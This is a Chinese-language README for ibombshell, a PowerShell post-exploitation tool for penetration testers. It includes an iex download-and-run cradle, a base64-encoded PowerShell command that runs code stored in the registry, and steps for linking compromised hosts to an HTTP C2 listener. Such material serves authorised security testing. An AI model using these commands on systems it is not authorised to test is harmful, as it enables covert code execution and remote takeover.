,--.!, _ ____ __ _____ __ ____
__/ -*- (_) __ )____ ____ ___ / /_ / ___// /_ ___ / / /
,d08b. '|` / / __ / __ \/ __ `__ \/ __ \\__ \/ __ \/ _ \/ / /
0088MM / / /_/ / /_/ / / / / / / /_/ /__/ / / / __/ / /
`9MMP' /_/_____/\____/_/ /_/ /_/_.___/____/_/ /_/\___/_/_/
[+] 启动控制台...
[*] 控制台就绪!
ibombshell 是一款使用 PowerShell 编写的工具,可让你随时拥有一个具备后渗透功能(某些情况下还具备利用功能)的提示符。它是一个直接下载到内存中的 Shell,提供大量渗透测试功能。这些功能可以以 PowerShell 函数的形式直接下载到内存中。这种执行方式被称为 everywhere。
此外,ibombshell 还提供了第二种执行模式,称为 Silently(静默模式),允许渗透测试员执行一个 ibombshell 实例(称为 warrior)。受入侵的计算机将通过 HTTP 连接到一个 C2 面板。因此,可以控制 warrior 并将函数加载到内存中,以辅助渗透测试员。这发生在后渗透阶段。
要运行 ibombshell everywhere,必须安装 PowerShell 3.0 或更高版本。对于非 Windows 操作系统,可以在 PowerShell GitHub 上了解更多信息 - PowerShell for every system!。
要运行 ibombshell silently mode,需要 Python 3.6 以及一些 Python 库。可以通过以下方式安装:
cd ibombshell\ c2/
pip install -r requirements.txt
注意:ibombshell C2 需在 python 3.X 上运行。请确保你运行的是与此版本对应的 pip。
ibombshell 有两种执行模式:
要加载 ibombshell,只需在 PowerShell 中运行:
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)
现在,可以运行下载的 ibombshell 控制台:
console
如果需要在隔离环境中使用 ibombshell,必须首先在联网环境中准备好你的计算机。加载所有需要的函数,并使用 savefunctions 将它们保存到 Windows 注册表中。
现在,可以使用以下 base 64 代码获取 ibombshell:
powershell.exe -E "JABwAGEAdABoACAAPQAgACcAaABrAGMAdQA6AFwAcwBvAGYAdAB3AGEAcgBlAFwAYwBsAGEAcwBzAGUAcwBcAGkAYgBvAG0AYgBzAGgAZQBsAGwAXABjAG8AbgBzAG8AbABlACcAOwAgAHQAcgB5ACAAewAJAGkAZgAoAHQAZQ
BzAHQALQBwAGEAdABoACAAJABwAGEAdABoACkAIAB7ACAAJABjAG8AbgBzAG8AbABlACAAPQAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAcABhAHQAaAApAC4ATgBhAG0AZQA7ACAAYwBkACAAaABrAGMAdQA6
ADsAIAAkAG4AYQBtAGUAIAA9ACAAJABjAG8AbgBzAG8AbABlAC4AcwBwAGwAaQB0ACgAIgBcACIAKQBbAC0AMQBdADsAIAAkAGMAbwBkAGUAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAJABjAG
8AbgBzAG8AbABlACIAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAUAByAG8AcABlAHIAdAB5ACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUA
YwB0ACAAewBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAcABzAG8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIABAAHsAIgBwAHIAbwBwAGUAcgB0AHkAIgA9ACQAXwA7ACAAIgBWAGEAbAB1AGUAIgAgAD0AIAAoAEcAZQ
B0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQAYwBvAG4AcwBvAGwAZQAiACAALQBOAGEAbQBlACAAJABfACkALgAkAF8AfQB9ACkALgBWAGEAbAB1AGUAOwAgACQAYwBvAGQAZQAgAHwAIABv
AHUAdAAtAHMAdAByAGkAbgBnACAAfAAgAGkAZQB4ADsAIABjADoAOwAgAGMAbwBuAHMAbwBsAGUAOwB9AH0AYwBhAHQAYwBoAHsAdwByAGkAdABlAC0AaABvAHMAdAAgACQARQByAHIAbwByAFsAMABdAH0A"
此版本允许您运行 ibombshell 控制台,并通过 Python 创建的 C2 面板进行远程控制。要运行此版本,首先必须在 PowerShell 中启动控制台进程:
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)
在 ibombshell C2 路径下,准备 C2:
python3 ibombshell.py
并创建 warrior 将连接的监听器:
iBombShell> load modules/listener.py
[+] Loading module...
[+] Module loaded!
iBombShell[modules/listener.py]> run
默认监听端口为 8080。最后,您可以在主机上以静默模式启动控制台以获得远程控制:
console -Silently -uriConsole http://[ip or domain]:[port]
ibombshell 控制面板的基本操作遵循以下架构:
ibombshell C2
| |
| newibombshell |
+--------------------->| --+ 注册
| |<--+ 来自 IP
| get functions |
| and instructions |
+--------------------->|
| |
| send functions |
| and instructions |
execute +-- |<---------------------+
+-->| |
| results |
+--------------------->|
| |
我们创建了一个包含所有必要组件的 Docker 容器,以便其正常运行。从 Dockerfile 所在位置运行以下命令:
sudo docker build -t "ibombshell" .
sudo docker run -it ibombshell
一些示例视频...
本项目采用 GNU 通用公共许可证授权 - 详情请参见 LICENSE 文件
本软件按“原样”提供,不提供任何明示或暗示的担保,包括但不限于对适销性、特定用途适用性和非侵权的保证。在任何情况下,无论基于何种法律理论(合同、侵权或其他),作者或版权持有人均不对因使用本软件或与本软件的使用或其他交易有关的任何索赔、损害或其他责任负责。每当您向包含许可证声明的存储库做出贡献时,您同意在相同条款下许可您的贡献,并确认您有权在此类条款下许可您的贡献。如果您有单独的协议(例如贡献者许可协议)以不同条款许可您的贡献,则该协议将优先适用。
本软件没有 QA 流程。本软件是一个概念验证。
如有任何问题,请联系: